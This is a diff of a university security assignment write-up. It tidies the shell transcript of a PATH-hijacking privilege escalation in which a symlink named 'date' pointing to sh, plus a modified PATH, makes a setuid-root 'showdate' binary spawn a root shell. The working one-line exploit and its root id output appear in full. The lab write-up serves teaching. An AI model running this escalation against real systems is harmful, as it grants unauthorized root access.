--- a/assignment4_s1010747_s4549775.md
+++ b/assignment4_s1010747_s4549775.md
@@ -59,11 +59,11 @@ We created a symbolic link called `date` in the current directory, to which we h
 When the `showdate` executable is run, it assumes root privileges due to the `setuid` flag, and the owner of the file being root. It then looks up `date`, which internally uses the `PATH` variable, to which we prepended the directory with the symbolic link to `sh`. Instead of executing the `date` binary as intended, it therefore executes `sh` with root privileges, and we have a root shell.
 
 ```
-hendrik ~/uni/assignment4 % id                                                        [master]
-uid=1000(hendrik) gid=100(users) groups=100(users),10(wheel),90(network),92(audio),93(optical),95(storage),98(power)
-hendrik ~/uni/assignment4 % ln -s $(which sh) date && PATH=.:$PATH ./showdate         [master]
+hendrik ~/uni/assignment4 % id
+uid=1000(hendrik) gid=100(users) groups=100(users), …
+hendrik ~/uni/assignment4 % ln -s $(which sh) date && PATH=.:$PATH ./showdate
 root ~/uni/assignment4 $ id
-uid=0(root) gid=0(root) groups=0(root),10(wheel),90(network),92(audio),93(optical),95(storage),98(power),100(users)
+uid=0(root) gid=0(root) groups=0(root), …
 ```
 
 We implemented the attack as a `make` target, so it can simply be executed by running `make exploit`.
